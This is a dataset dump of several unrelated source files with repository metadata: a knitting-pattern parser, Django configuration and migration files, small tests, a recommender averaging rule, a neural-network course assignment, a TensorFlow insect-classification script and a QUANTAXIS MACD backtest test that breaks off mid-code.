return Iterator_Closure(context.parser.symbolTable, include_rs, include_ws, start_num, end_num)
else:
ints = []
for i in range(start_num, end_num + 1):
if i % 2 == 1 and include_rs:
ints.append(i)
elif i % 2 == 0 and include_ws:
ints.append(i)
return ints
@action
def rep_condition(_, nodes: list) -> Tuple[bool, Union[int, Num_Closure]]:
"""
:param _: the context passed by parglare but not used
:param nodes: the nodes needed to parse the rep_condition and repeat information
:return: the type of repetition policy "stitches", the number of loops that must remain to follow this replications
"""
if len(nodes) == 2:
assert nodes[1] == "end"
remaining_sts = 0
elif len(nodes) == 3:
assert nodes[2] == "st"
remaining_sts = 1
else:
assert len(nodes) == 4 and nodes[3] == "sts"
remaining_sts = nodes[2]
return False, remaining_sts
@action
def rowOrRound(_, nodes: str) -> str:
"""
:param _: context passed by parglare but not used
:param nodes: the string marking the type of construction
:return: will return "row" or "rows" and error otherwise
"""
if "round" in nodes:
assert False, "Rounds not yet supported in KS2.0"
return nodes
@action
def num_assign(context: Context, nodes: list) -> Num_Assignment_Closure:
"""
parses a definition of a variable number and adds it to the symbol table
:param context: context used to access symbol table for storing the definition
:param nodes: nodes used to parse numerical definition
:return: the string keyed to the numerical expression
"""
symbol = nodes[0]
data = nodes[2]
return Num_Assignment_Closure(context.parser.symbolTable, symbol, data)
@action
def num_id(context: Context, nodes: list) -> Num_Variable_Closure:
"""
gathers number by keyword from symbol table
:param context: used to access symbol table
:param nodes: the keyword to access the numerical value
:return: the numerical value that that keyword processes to
"""
symbol = nodes[0]
symbol_table = context.parser.symbolTable
return Num_Variable_Closure(symbol_table, symbol)
@action
def num_exp(context, nodes: list) -> Union[int, Num_Closure]:
"""
:param context: used to get current row state
:param nodes: the nodes used to create an integer
:return: the integer processed from the nodes
"""
if type(nodes[0]) is int:
assert nodes[0] >= 0, f"Non Negative Numbers:{nodes[0]}"
elif type(nodes[0]) is str and nodes[0] == "currow":
return Current_Row_Closure(context.parser.symbolTable)
return nodes[0]
@action
def num_op(context, nodes: list) -> Union[int, Operation_Closure]:
"""
:param context: context not used
:param nodes: the nodes involved in teh operation
:return: the integer resulting from the operation
"""
firstIndex = 0
secondIndex = 2
opIndex = 1
if nodes[0] == "(":
firstIndex += 1
secondIndex += 1
opIndex += 1
first_num = nodes[firstIndex]
second_num = nodes[secondIndex]
op = nodes[opIndex]
if type(first_num) is int and type(second_num) is int: # no closure needed
if op == "+":
return first_num + second_num
elif op == "-":
return first_num - second_num
elif op == "*":
return first_num * second_num
elif op == "/":
return first_num / second_num
else:
symbol_table = context.parser.symbolTable
return Operation_Closure(symbol_table, first_num, op, second_num)
def _stripToDigits(text: str) -> str:
digits = ""
for c in text:
if c.isdigit():
digits += c
return digits
@action
def integer(_, node: str) -> int:
"""
:param _: context not used
:param node: the number string
:return: the integer specified
"""
string = _stripToDigits(node)
i = int(string)
return i
@action
def opId(context: Context, nodes: List[str]) -> Union[Stitch_Definition, Cable_Definition]:
"""
:param context: context used to access symbol table
:param nodes: node used to identify stitch type
:return: the stitch definition or cable definition keyed to this term
"""
currentSymbolTable = context.parser.symbolTable
assert nodes[0] in currentSymbolTable, "No stitch defined ID={}".format(nodes[0])
return currentSymbolTable[nodes[0]]
| [
"hofmann.megan@gmail.com"
] | hofmann.megan@gmail.com |
24948c5e9cc6f4ade5f814b095ccb9c0319bae21 | 688788c577776b945f1965187d404757b687c8e1 | /appmine/appmine/urls.py | 6c2b929fe2c6afbf205967368e44be58babfa85a | [] | no_license | 3Labs/AppMine | 8d01b1a39c319201de6ba323cb0fcf3d2d95dd62 | fa68aac46ecad1667610f8cbbd89e2b8eb682004 | refs/heads/master | 2020-07-23T16:36:35.584685 | 2019-09-10T20:33:19 | 2019-09-10T20:33:19 | 207,631,746 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 966 | py | """financialchat URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import include,url
from django.contrib import admin
from django.contrib.auth import views as auth_views
urlpatterns = [
url(r'^$', auth_views.login),
url(r'^chat/', include('chat.urls')),
url(r'^admin/', admin.site.urls),
url(r'^accounts/', include('django.contrib.auth.urls'))
]
| [
"tri3labs@gmail.com"
] | tri3labs@gmail.com |
917caa8803de6237510c15044bfbe71ebee37d83 | 4564fd0cfb9009f0b85d15c3b9164b865c4c86e7 | /tests/test_model.py | 6640508bf3a1581cded6a9fe52d2d2d572937326 | [
"Apache-2.0"
] | permissive | rajaramcomputers/client | 0188a1cf8e989dcd180c280a4db4d00c44bac390 | 65badf61fb9a5430596d6d2c0b9b7833cf30ec06 | refs/heads/master | 2021-01-16T21:59:35.657394 | 2016-02-01T22:08:18 | 2016-02-01T22:08:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 748 | py | """ run with
nosetests -v --nocapture tests/test_model.py
or
nosetests -v tests/test_model.py
"""
from __future__ import print_function
from pprint import pprint
from cloudmesh_base.util import HEADING
import cloudmesh_client.db
import cloudmesh_client.db.model
class Test_model:
def setup(self):
pass
def tearDown(self):
pass
def test_001(self):
HEADING()
pprint(cloudmesh_client.db.tables())
assert True
def test_002(self):
HEADING()
print(cloudmesh_client.db.tablenames())
assert True
def test_003(self):
HEADING()
for name in cloudmesh_client.db.tablenames():
print(cloudmesh_client.db.table(name))
assert True
| [
"laszewski@gmail.com"
] | laszewski@gmail.com |
ba1f5e9dd3eb7cd681014c2d6378586c4ecae990 | 6ce1b574542eacf8c416d0e3d8499e649f76181b | /CursoIntensPython/exerc_4.11.5.py | 280f966d22fcbb683b0eca60fc43952453bea556 | [] | no_license | AlvanDeMelo/CODIGOS-PESSOAIS | ea9f7733c94d3f8162ecc0d3147f04e6f6db9110 | d905277285806c3ad363e2def6ab17bf1b1264b6 | refs/heads/master | 2023-04-22T23:45:32.157509 | 2021-04-22T20:46:21 | 2021-04-22T20:46:21 | 293,786,965 | 1 | 0 | null | 2021-04-17T19:46:39 | 2020-09-08T11:15:54 | Python | UTF-8 | Python | false | false | 252 | py | #Exercicio 4.11.5 Os 3 itens do meio com método for
#Lista
comidas = ['arroz','feijão','batata','hamburguer','milkshake']
#Exibe o 3 ultimos sabores
print('Os 3 intens do meio da lista são: ')
for comida in comidas[1:4]:
print(comida.title())
| [
"noreply@github.com"
] | noreply@github.com |
99d69fd47889f9ce0d7b1d153f7192df5ac02b56 | ea1b340ccc3c151f508df6a7e7ab8701cd5c5cb5 | /Experiment Processing/recommender/voting_rules/average.py | 2a5cf2635c002c3d69a5d93f1137feacb84964f3 | [
"MIT"
] | permissive | abansagi/GroupRecommendationThesis | a0ed6effe93c5acd65d1e6c462ba3443869b7645 | 4a4b8c2f230d7db3b6b36342ab06b02f146462ae | refs/heads/main | 2023-04-18T16:19:58.468381 | 2021-11-17T14:16:05 | 2021-11-17T14:16:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 460 | py | from recommender.voting_rules.abstract_voting_rule import AbstractVotingRule
class Average(AbstractVotingRule):
"""
"Average" aggregation strategy, works by calculating the average rating for each song.
"""
def get_name(self):
return "Average"
def voting_rule(self, song, song_ratings):
average = 0
for user in song_ratings:
average += song_ratings[user]
return average / len(song_ratings)
| [
"aurelbansagi@gmail.com"
] | aurelbansagi@gmail.com |
7debab71f5c3def961101e6b1dc4e0993a4717e7 | cd835e889bce6f1a9cff91b764ab19ad70ff4134 | /repository/migrations/0004_auto_20180327_0327.py | 1ca152e43e6eae7c5e222760282eecde464e1312 | [] | no_license | dabingya/cmdb | 781ff842714ceda0904796858a938e8aece594dd | 731a1a036aca7002398b8c8a72a9d167b1236b64 | refs/heads/master | 2020-03-19T07:23:02.206823 | 2018-07-09T01:11:56 | 2018-07-09T01:11:56 | 136,109,091 | 6 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,087 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-03-27 03:27
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('repository', '0003_connect_domain_userprofile'),
]
operations = [
migrations.CreateModel(
name='Asset',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('release', models.CharField(max_length=20, verbose_name='系统版本')),
('kernel_version', models.CharField(max_length=20, verbose_name='内核版本')),
('cpu_type', models.CharField(max_length=50, verbose_name='CPU型号')),
('cpu_nums', models.IntegerField(default=0, verbose_name='CPU个数')),
('mem', models.FloatField(default=0.0, verbose_name='内存')),
('swap', models.FloatField(default=0.0, verbose_name='swap')),
],
),
migrations.AddField(
model_name='idc',
name='mem',
field=models.FloatField(default=0.0, verbose_name='内存'),
),
migrations.AddField(
model_name='server',
name='env_status',
field=models.CharField(choices=[('test', '测试'), ('prod', '生产'), ('preprod', '预生产'), ('base', '基础')], default='测试', max_length=20, verbose_name='所属环境'),
),
migrations.AlterField(
model_name='domain',
name='datetime',
field=models.DateField(default='2018-03-27', verbose_name='到期时间'),
),
migrations.AlterField(
model_name='idc',
name='create_at',
field=models.DateField(default='2018-03-27', verbose_name='创建时间'),
),
migrations.AlterField(
model_name='team',
name='create_at',
field=models.DateField(default='2018-03-27', verbose_name='创建时间'),
),
]
| [
"547684265@qq.com"
] | 547684265@qq.com |
441d4b4c3c29fbcd3fd0ed67763e1ad1e0832f34 | 7804c198ae1e6a56c20ebc87071b16bb24d190be | /Proj1.py | a2258dc408d5496aca532572327f431de268f621 | [] | no_license | nilesh12121996/Breast-Cancer-Classification | c989bfdf35cea292efd20e6622c581f7b60cc4f9 | a41d103bb893a1de579fca7353277657e6a5cf4e | refs/heads/main | 2023-07-03T17:26:23.798299 | 2021-08-06T20:35:57 | 2021-08-06T20:35:57 | 393,495,611 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,435 | py | import sys
import numpy as np
import pandas as pd
from scipy import signal
###################
## Solver for single layer network of three hidden nodes.
## Output node has no bias but hidden nodes have bias.
## We automatically accounted for this by adding an extra
## column of 1's to the input data.
## return [W, w] where the rows of W are the three hidden
## node weights and w are the output node weights
###################
def back_prop(traindata, trainlabels):
##############################
### Initialize all weights ###
W = np.random.rand(3, cols)
w = np.random.rand(3)
###################################################
### Calculate initial objective in variable obj ###
obj = 0
hidd_layers = np.matmul(traindata, np.transpose(W))
sigmoid = lambda x: 1/(1+np.exp(-x))
hidd_layers = np.array([sigmoid(xi) for xi in hidd_layers])
out_layer = np.matmul(hidd_layers,np.transpose(w))
obj = np.sum(np.square(out_layer - trainlabels))
###############################
### Begin gradient descent ####
stop = 0.001
epochs = 1000
eta = .001
prevobj = np.inf
i = 0
while (prevobj - obj > stop and i < epochs):
# Update previous objective
prevobj= obj
# Calculate gradient update dellw for output node w
# dellw is the same dimension as w
delw= (np.dot(hidd_layers[0,:],w)-trainlabels[0])*hidd_layers[0,:]
for j in range(1,rows):
delw += (np.dot(hidd_layers[j,:],np.transpose(w))-trainlabels[j])*hidd_layers[j,:]
# Update w
w= w - eta*delw
# Calculate gradient update dellW for hidden layer weights W.
# dellW has to be of same dimension as W.
# Follow the steps below.
# Our three hidden nodes are s, u, and v.
# Let us first calculate dells. After that we do dellu and dellv.
# Recall that dells = df/dz1 * (dz1/ds1, dz1,ds2)
dels= np.sum(np.dot(hidd_layers[0,:],w)-trainlabels[0])*w[0]*hidd_layers[0,0]*(1-hidd_layers[0,0])*traindata[0,:]
for j in range(1, rows):
dels = dels+ np.sum(np.dot(hidd_layers[j, :], w) - trainlabels[j]) * w[0] * hidd_layers[j, 0] * (
1 - hidd_layers[j, 0]) * traindata[j, :]
# Calculate dellu
delu = np.sum(np.dot(hidd_layers[0, :], w) - trainlabels[0]) * w[1] * hidd_layers[0, 1] * (
1 - hidd_layers[0, 1]) * traindata[0, :]
for j in range(1, rows):
delu = delu + np.sum(np.dot(hidd_layers[j, :], w) - trainlabels[j]) * w[1] * hidd_layers[j, 1] * (
1 - hidd_layers[j, 1]) * traindata[j, :]
# Calculate dellv
delv = np.sum(np.dot(hidd_layers[0, :], w) - trainlabels[0]) * w[2] * hidd_layers[0, 2] * (
1 - hidd_layers[0, 2]) * traindata[0, :]
for j in range(1, rows):
delv = delv + np.sum(np.dot(hidd_layers[j, :], w) - trainlabels[j]) * w[2] * hidd_layers[j, 2] * (
1 - hidd_layers[j, 2]) * traindata[j, :]
# Put dells, dellu, and dellv as rows of dellW
delW= np.array([dels,delu,delv])
# Update W
W= W - eta*delW
# Recalculate objective
hidd_layers=np.matmul(traindata ,np.transpose(W))
hidd_layers= np.array([sigmoid(xi) for xi in hidd_layers])
out_layer = np.matmul(hidd_layers, np.transpose(w))
obj = np.sum(np.square(out_layer - trainlabels))
# Update i and print objective (comment print before final submission)
i = i + 1
print("i=", i, " Objective=", obj)
return [W, w]
###################
## Stochastic gradient descent for same network as above
## return [W, w] where the rows of W are the three hidden
## node weights and w are the output node weights
###################
def sgd(traindata, trainlabels, batch_size):
##############################
### Initialize all weights ###
pW = np.random.rand(3, cols)
pw = np.random.rand(3)
###################################################
### Calculate initial objective in variable obj ###
obj = 0
mini_train_data=traindata[:batch_size,:]
mini_trainlabels = trainlabels[:batch_size]
mini_hidd_layers = np.matmul(mini_train_data, np.transpose(pW))
sigmoid = lambda x: 1 / (1 + np.exp(-x))
mini_hidd_layers = np.array([sigmoid(xi) for xi in mini_hidd_layers])
mini_out_layer = np.matmul(mini_hidd_layers, np.transpose(pw))
obj = np.sum(np.square(mini_out_layer - mini_trainlabels))
###############################
### Begin gradient descent ####
stop = 0.001
epochs = 1000
eta = .1
prevobj = np.inf
i = 0
while (i < epochs):
# Update previous objective
w= pw
W= pW
# Calculate gradient update dellw for output node w
# dellw is the same dimension as w
delw = (np.dot(mini_hidd_layers[0, :], w) - mini_trainlabels[0]) * mini_hidd_layers[0, :]
for j in range(1, batch_size):
delw += (np.dot(mini_hidd_layers[j, :], np.transpose(w)) - mini_trainlabels[j]) * mini_hidd_layers[j, :]
# Update w
w = w - eta * delw
# Calculate gradient update dellW for hidden layer weights W.
# dellW has to be of same dimension as W.
# Follow the steps below.
# Our three hidden nodes are s, u, and v.
# Let us first calculate dells. After that we do dellu and dellv.
# Recall that dells = df/dz1 * (dz1/ds1, dz1,ds2)
dels = np.sum(np.dot(mini_hidd_layers[0, :], w) - mini_trainlabels[0]) * w[0] * mini_hidd_layers[0, 0] * (
1 - mini_hidd_layers[0, 0]) * mini_train_data[0, :]
for j in range(1, batch_size):
dels = dels + np.sum(np.dot(mini_hidd_layers[j, :], w) - mini_trainlabels[j]) * w[0] * mini_hidd_layers[j, 0] * (
1 - mini_hidd_layers[j, 0]) * mini_train_data[j, :]
# Calculate dellu
delu = np.sum(np.dot(mini_hidd_layers[0, :], w) - mini_trainlabels[0]) * w[1] * mini_hidd_layers[0, 1] * (
1 - mini_hidd_layers[0, 1]) * mini_train_data[0, :]
for j in range(1, batch_size):
delu = delu + np.sum(np.dot(mini_hidd_layers[j, :], w) - mini_trainlabels[j]) * w[1] * mini_hidd_layers[j, 1] * (
1 - mini_hidd_layers[j, 1]) * mini_train_data[j, :]
# Calculate dellv
delv = np.sum(np.dot(mini_hidd_layers[0, :], w) - mini_trainlabels[0]) * w[2] * mini_hidd_layers[0, 2] * (
1 - mini_hidd_layers[0, 2]) * mini_train_data[0, :]
for j in range(1, batch_size):
delv = delv + np.sum(np.dot(mini_hidd_layers[j, :], w) - mini_trainlabels[j]) * w[2] * mini_hidd_layers[j, 2] * (
1 - mini_hidd_layers[j, 2]) * mini_train_data[j, :]
# Put dells, dellu, and dellv as rows of dellW
delW = np.array([dels, delu, delv])
# Update W
W = W - eta * delW
# Recalculate objective
hidd_layers = np.matmul(traindata, np.transpose(W))
sigmoid = lambda x: 1 / (1 + np.exp(-x))
hidd_layers = np.array([sigmoid(xi) for xi in hidd_layers])
mini_out_layer = np.matmul(hidd_layers, np.transpose(w))
obj = np.sum(np.square(mini_out_layer - trainlabels))
np.random.shuffle(traindata)
mini_train_data = traindata[:batch_size, :]
mini_trainlabels = trainlabels[:batch_size]
if (obj < prevobj):
prevobj = obj
pw = w
pW = W
# Update i and print objective (comment print before final submission)
i = i + 1
print("i=", i, " Objective=", obj)
return [pW, pw]
###################
## Back propagation gradient descent for a simple convolutional
## neural network containing one 2x2 convolution with global
## average pooling.
## Input to the network are 3x3 matrices.
## return the 2x2 convolutional kernel
###################
def convnet(traindata, trainlabels):
stop = 0.001
epochs = 1000
eta = .1
prevobj = np.inf
i = 0
train_len=len(trainlabels)
c = np.ones((2, 2))
obj = 0
for i in range(0, train_len):
hidd_layers = signal.convolve2d(traindata[i], c, mode='valid')
for j in range(0, 2, 1):
for k in range(0, 2, 1):
hidd_layers[j][k] = sigmoid(hidd_layers[j][k])
output_layer = (hidd_layers[0][0] + hidd_layers[0][1] + hidd_layers[1][0] + hidd_layers[1][1]) / 4
obj += (output_layer - labels[i]) ** 2
while (prevobj - obj > stop and i < epochs):
prevobj = obj
delc1 = 0
delc2 = 0
delc3 = 0
delc4 = 0
for i in range(0, train_len):
hidd_layers = signal.convolve2d(traindata[i], c, mode="valid")
for j in range(0, 2, 1):
for k in range(0, 2, 1):
hidd_layers[j][k] = sigmoid(hidd_layers[j][k])
dz1dc1 = hidd_layers[0][0]* (1- hidd_layers[0][0])* traindata[i][0][0]
dz2dc1 = hidd_layers[0][1]* (1- hidd_layers[0][1])* traindata[i][0][1]
dz3dc1 = hidd_layers[1][0]* (1- hidd_layers[1][0])* traindata[i][1][0]
dz4dc1 = hidd_layers[1][1]* (1- hidd_layers[1][1])* traindata[i][1][1]
dz1dc2 = hidd_layers[0][0]* (1- hidd_layers[0][0])* traindata[i][0][1]
dz2dc2 = hidd_layers[0][1]* (1- hidd_layers[0][1])* traindata[i][0][2]
dz3dc2 = hidd_layers[1][0]* (1- hidd_layers[1][0])* traindata[i][1][1]
dz4dc2 = hidd_layers[1][1]* (1- hidd_layers[1][1])* traindata[i][1][2]
dz1dc3 = hidd_layers[0][0]* (1- hidd_layers[0][0])* traindata[i][1][0]
dz2dc3 = hidd_layers[0][1]* (1- hidd_layers[0][1])* traindata[i][1][1]
dz3dc3 = hidd_layers[1][0]* (1- hidd_layers[1][0])* traindata[i][2][0]
dz4dc3 = hidd_layers[1][1]* (1- hidd_layers[1][1])* traindata[i][2][1]
dz1dc4 = hidd_layers[0][0]* (1- hidd_layers[0][0])* traindata[i][1][1]
dz2dc4 = hidd_layers[0][1]* (1- hidd_layers[0][1])* traindata[i][1][2]
dz3dc4 = hidd_layers[1][0]* (1- hidd_layers[1][0])* traindata[i][2][1]
dz4dc4 = hidd_layers[1][1]* (1- hidd_layers[1][1])* traindata[i][2][2]
f_rt = (hidd_layers[0][0]+ hidd_layers[0][1]+ hidd_layers[1][0]+ hidd_layers[1][1])/4 - labels[i]
delc3 += (f_rt * (dz1dc3 + dz2dc3 + dz3dc3 + dz4dc3)) / 2
delc2 += (f_rt * (dz1dc2 + dz2dc2 + dz3dc2 + dz4dc2)) / 2
delc1 += (f_rt * (dz1dc1 + dz2dc1 + dz3dc1 + dz4dc1)) / 2
delc4 += (f_rt * (dz1dc4 + dz2dc4 + dz3dc4 + dz4dc4)) / 2
c[0][0] -= eta * delc1
c[0][1] -= eta * delc2
c[1][0] -= eta * delc3
c[1][1] -= eta * delc4
obj = 0
for i in range(0, train_len):
hidd_layers = signal.convolve2d(traindata[i], c, mode='valid')
for j in range(0, 2, 1):
for k in range(0, 2, 1):
hidd_layers[j][k] = sigmoid(hidd_layers[j][k])
output_layer = (hidd_layers[0][0] + hidd_layers[0][1] + hidd_layers[1][0] + hidd_layers[1][1]) / 4
obj += (output_layer - labels[i]) ** 2
return c
###############
#### MAIN #####
###############
#######################################
### Read data for back_prop and sgd ###
#######################################
f = open(sys.argv[1])
data = np.loadtxt(f)
train = data[:, 1:]
trainlabels = data[:, 0]
onearray = np.ones((train.shape[0], 1))
train = np.append(train, onearray, axis=1)
f = open(sys.argv[2])
data = np.loadtxt(f)
test = data[:, 1:]
testlabels = data[:, 0]
onearray = np.ones((test.shape[0], 1))
test = np.append(test, onearray, axis=1)
rows = train.shape[0]
cols = train.shape[1]
hidden_nodes = 3
#########################
### Read data for convnet
#########################
traindir = sys.argv[3]
df = pd.read_csv(traindir + '/data.csv') # load images' names and labels
names = df['Name'].values
labels = df['Label'].values
traindata = np.empty((len(labels), 3, 3), dtype=np.float32)
for i in range(0, len(labels)):
image_matrix = np.loadtxt(traindir + '/' + names[i])
traindata[i] = image_matrix
testdir = sys.argv[4]
df = pd.read_csv(testdir + '/data.csv') # load images' names and labels
names2 = df['Name'].values
labels2 = df['Label'].values
testdata = np.empty((len(labels2), 3, 3), dtype=np.float32)
for i in range(0, len(labels2)):
image_matrix = np.loadtxt(testdir + '/' + names2[i])
testdata[i] = image_matrix
#######################
#### Train the networks
#######################
## Helper function
sigmoid = lambda x: 1 / (1 + np.exp(-x))
[W, w] = back_prop(train, trainlabels)
# A small batch size such as even 2 or 5 will also work
batch_size = 5
[W2, w2] = sgd(train, trainlabels, batch_size)
c = convnet(traindata, labels)
##################################
#### Classify test data as 1 or -1
##################################
OUT = open("back_prop_predictions", 'w')
bp_hidd_layers = np.matmul(test, np.transpose(W))
sigmoid = lambda x: 1 / (1 + np.exp(-x))
bp_hidd_layers = np.array([sigmoid(xi) for xi in bp_hidd_layers])
bp_out_layer= np.matmul(bp_hidd_layers,np.transpose(w))
for i in range(bp_out_layer.shape[0]):
if bp_out_layer[i]>0:
bp_out_layer[i] = 1
else:
bp_out_layer[i] = -1
OUT.write(str(bp_out_layer))
OUT = open("sgd_predictions", 'w')
sgd_hidd_layers = np.matmul(test, np.transpose(W2))
sgd_hidd_layers = np.array([sigmoid(xi) for xi in sgd_hidd_layers])
sgd_out_layer= np.matmul(sgd_hidd_layers,np.transpose(w2))
for i in range(sgd_out_layer.shape[0]):
if sgd_out_layer[i]>0:
sgd_out_layer[i] = 1
else:
sgd_out_layer[i] = -1
OUT.write(str(sgd_out_layer))
## For the convnet print the 2x2 kernel c in the
## first two lines. In the following lines print
## the test predictions.
OUT = open("convnet_output", 'w')
OUT.write(str(c)+'\n')
for i in range(0,len(labels2)):
cnn_hid_layers = signal.convolve2d(testdata[i],c, mode='valid')
for j in range(0,2,1):
for k in range(0,2,1):
cnn_hid_layers[j][k] = sigmoid(cnn_hid_layers[j][k])
cnn_output_layer = (cnn_hid_layers[0][0] + cnn_hid_layers[0][1]+cnn_hid_layers[1][0]+cnn_hid_layers[1][1])/4
if (cnn_output_layer < 0.5):
OUT.write(str(-1)+'\n')
else:
OUT.write(str(1)+'\n')
| [
"noreply@github.com"
] | noreply@github.com |
16c2df00ba5b93c7a908956911ca1c69f0531f1d | 318f9349aa8148e432ec70c9c10cddd1390a4071 | /predict.py | dac862c2c3bf6d7f6f949a74a5ca9be684412c78 | [] | no_license | wangjianqun1/Insect_Recognition | cc24d022f16ea424d323df578560301f47dcceca | 2765f6c3e8c38272ba27fb0d7b4858bb122620b8 | refs/heads/main | 2023-06-17T17:41:56.245821 | 2021-07-14T16:47:20 | 2021-07-14T16:47:20 | 386,003,365 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,163 | py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
from skimage import io, transform
import tensorflow as tf
import numpy as np
tf = tf.compat.v1
path1 = ".\insecttest/草履蚧/709.jpg"
path2 = ".\insecttest/褐边绿刺蛾/成虫.jpg"
path3 = ".\insecttest/黄刺蛾/成虫.jpg"
path4 = ".\insecttest/柳蓝叶甲/666 (10).jpg"
path5 = ".\insecttest/麻皮蝽/667麻皮蝽.jpg"
path6 = ".\insecttest/美国白蛾/888 (33).jpg"
path7 = ".\insecttest/人纹污灯蛾/999 (43).jpg"
path8 = ".\insecttest/日本脊吉丁/580日本脊吉丁.jpg"
path9 = ".\insecttest/桑天牛/499.jpg"
path10 = ".\insecttest/霜天蛾/104 (19).jpg"
path11 = ".\insecttest/丝带凤蝶/009丝带凤蝶.jpg"
path12 = ".\insecttest/松墨天牛/222 (27).jpg"
path13 = ".\insecttest/星天牛/1876-1F42Q619393M.jpg"
path14 = ".\insecttest/杨扇舟蛾/426.jpg"
path15 = ".\insecttest/杨小舟蛾/426杨小舟蛾.jpg"
flower_dict = {0:'丝带凤蝶',1:'人纹污灯蛾',2:'日本脊吉丁',3:'星天牛',4:'杨小舟蛾',5:'杨扇舟蛾',6:'松墨天牛',7:'柳蓝叶甲'
,8:'桑天牛',9:'美国白蛾',10:'草履蚧',11:'褐边绿刺蛾',12:'霜天蛾',13:'麻皮蝽',14:'黄刺蛾'}
w = 100
h = 100
c = 3
def read_one_image(path):
img = io.imread(path)
try:
if img.shape[2] == 3:
img = transform.resize(img, (w, h))
except:
return
return np.asarray(img)
with tf.Session() as sess:
data = []
data1 = read_one_image(path1)
data2 = read_one_image(path2)
data3 = read_one_image(path3)
data4 = read_one_image(path4)
data5 = read_one_image(path5)
data6 = read_one_image(path6)
data7 = read_one_image(path7)
data8 = read_one_image(path8)
data9 = read_one_image(path9)
data10 = read_one_image(path10)
data11 = read_one_image(path11)
data12 = read_one_image(path12)
data13 = read_one_image(path13)
data14 = read_one_image(path14)
data15 = read_one_image(path15)
data.append(data1)
data.append(data2)
data.append(data3)
data.append(data4)
data.append(data5)
data.append(data6)
data.append(data7)
data.append(data8)
data.append(data9)
data.append(data10)
data.append(data11)
data.append(data12)
data.append(data13)
data.append(data14)
data.append(data15)
saver = tf.train.import_meta_graph('.\model\model.ckpt.meta')
saver.restore(sess, tf.train.latest_checkpoint('.\model'))
graph = tf.get_default_graph()
x = graph.get_tensor_by_name("x:0")
feed_dict = {x: data}
logits = graph.get_tensor_by_name("logits_eval:0")
classification_result = sess.run(logits, feed_dict)
# 打印出预测矩阵
print(classification_result)
# 打印出预测矩阵每一行最大值的索引
print(tf.argmax(classification_result, 1).eval())
# 根据索引通过字典对应花的分类
output = []
output = tf.argmax(classification_result, 1).eval()
for i in range(len(output)):
print("第", i + 1, "朵花预测:" + flower_dict[output[i]])
print(output[i])
| [
"noreply@github.com"
] | noreply@github.com |
a9e2cbb4176684f4ffa52c1888fae3102c5fa7b6 | 9b59f76f3b312951519a15651290476c34a54174 | /QUANTAXIS_Test/QABacktest_Test/QABacktestSimple_Test.py | 37e9feda4909d833898186c4d41be55ad36d35fd | [
"MIT"
] | permissive | sjtututu/QUANTAXIS | b8d9ba35d20159680f25cd3e583ebcfc7ff34c75 | e9e20cdeda8b8d132433037b639a7e60f286a190 | refs/heads/master | 2020-08-16T11:19:19.689925 | 2020-02-22T01:21:57 | 2020-02-22T01:21:57 | 215,495,655 | 1 | 0 | MIT | 2019-12-28T08:13:57 | 2019-10-16T08:22:54 | Python | UTF-8 | Python | false | false | 4,471 | py | import unittest
import numpy as np
import pandas as pd
import QUANTAXIS as QA
class QABacktestSimple_Test(unittest.TestCase):
# define the MACD strategy
def MACD_JCSC(self, dataframe, SHORT=12, LONG=26, M=9):
"""
1.DIF向上突破DEA,买入信号参考。
2.DIF向下跌破DEA,卖出信号参考。
"""
CLOSE = dataframe.close
DIFF = QA.EMA(CLOSE, SHORT) - QA.EMA(CLOSE, LONG)
DEA = QA.EMA(DIFF, M)
MACD = 2 * (DIFF - DEA)
CROSS_JC = QA.CROSS(DIFF, DEA)
CROSS_SC = QA.CROSS(DEA, DIFF)
ZERO = 0
return pd.DataFrame(
{'DIFF': DIFF, 'DEA': DEA, 'MACD': MACD, 'CROSS_JC': CROSS_JC, 'CROSS_SC': CROSS_SC, 'ZERO': ZERO})
def setUp(self):
# 准备数据
# create account
self.Account = QA.QA_Account()
self.Broker = QA.QA_BacktestBroker()
self.Account.reset_assets(1000000)
self.Account.account_cookie = 'user_admin_macd'
# get data from mongodb
self.data = QA.QA_fetch_stock_day_adv(
['000001', '000002', '000004', '600000'], '2017-09-01', '2018-05-20')
self.data = self.data.to_qfq()
# add indicator
self.ind = self.data.add_func(self.MACD_JCSC)
# ind.xs('000001',level=1)['2018-01'].plot()
self.data_forbacktest = self.data.select_time(
'2018-01-01', '2018-05-20')
def tearDown(self):
print(self.Account.history)
print(self.Account.history_table)
print(self.Account.daily_hold)
# create Risk analysis
Risk = QA.QA_Risk(self.Account)
print(Risk.message)
print(Risk.assets)
Risk.plot_assets_curve()
Risk.plot_dailyhold()
Risk.plot_signal()
# Risk.assets.plot()
# Risk.benchmark_assets.plot()
# save result
self.Account.save()
Risk.save()
account_info = QA.QA_fetch_account(
{'account_cookie': 'user_admin_macd'})
account = QA.QA_Account().from_message(account_info[0])
print(account)
def test_simpleQABacktest(self):
for items in self.data_forbacktest.panel_gen:
for item in items.security_gen:
daily_ind = self.ind.loc[item.index]
if daily_ind.CROSS_JC.iloc[0] > 0:
order = self.Account.send_order(
code=item.code[0],
time=item.date[0],
amount=1000,
towards=QA.ORDER_DIRECTION.BUY,
price=0,
order_model=QA.ORDER_MODEL.CLOSE,
amount_model=QA.AMOUNT_MODEL.BY_AMOUNT
)
if order:
self.Broker.receive_order(QA.QA_Event(order=order, market_data=item))
trade_mes = self.Broker.query_orders(self.Account.account_cookie, 'filled')
res = trade_mes.loc[order.account_cookie, order.realorder_id]
order.trade(res.trade_id, res.trade_price,
res.trade_amount, res.trade_time)
elif daily_ind.CROSS_SC.iloc[0] > 0:
if self.Account.sell_available.get(item.code[0], 0) > 0:
order = self.Account.send_order(
code=item.code[0],
